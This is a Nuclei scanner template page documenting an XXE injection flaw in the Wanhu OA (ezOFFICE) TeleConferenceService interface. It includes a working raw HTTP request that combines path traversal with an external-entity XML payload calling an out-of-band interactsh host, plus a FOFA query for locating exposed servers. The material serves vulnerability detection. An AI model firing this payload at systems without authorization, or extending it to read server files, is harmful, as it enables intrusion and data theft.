Skip to content
Nuclei Templates

Wanhu OA TeleConferenceService Interface - XML External Entity Injection

ID: wanhu-teleconferenceservice-xxe

Severity: high

Author: SleepingBag945

Tags: wanhu,oa,xxe

Description

Section titled “Description”

There is an XXE injection vulnerability in the Wanhu OA TeleConferenceService interface. An attacker can use the vulnerability to continue XXE injection to obtain sensitive information on the server.

YAML Source

Section titled “YAML Source”
id: wanhu-teleconferenceservice-xxe


info:
  name: Wanhu OA TeleConferenceService Interface - XML External Entity Injection
  author: SleepingBag945
  severity: high
  description: |
    There is an XXE injection vulnerability in the Wanhu OA TeleConferenceService interface. An attacker can use the vulnerability to continue XXE injection to obtain sensitive information on the server.
  reference:
    - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20TeleConferenceService%20XXE注入漏洞.html
    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20TeleConferenceService%20XXE%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="万户网络-ezOFFICE"
  tags: wanhu,oa,xxe


http:
  - raw:
      - |
        POST /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService HTTP/1.1
        Host: {{Hostname}}


        <?xml version="1.0" encoding="UTF-8" ?>
        <!DOCTYPE ANY [
        <!ENTITY xxe SYSTEM "http://{{interactsh-url}}" >]>
        <value>&xxe;</value>


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"


      - type: word
        part: body
        words:
          - "<response>"
          - "<retcode>"
        condition: and


      - type: word
        part: header
        words:
          - "text/xml"
# digest: 4a0a00473045022100eecbac7ae2c76b60cdb7c957ff2129debb97c3defec4c83c59ee153066d6d88302202fff0038070368e6dfeff5896bc60361ebfc26c9b05306b999b17c9ada7ebd72:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/wanhu/wanhu-teleconferenceservice-xxe.yaml"

View on Github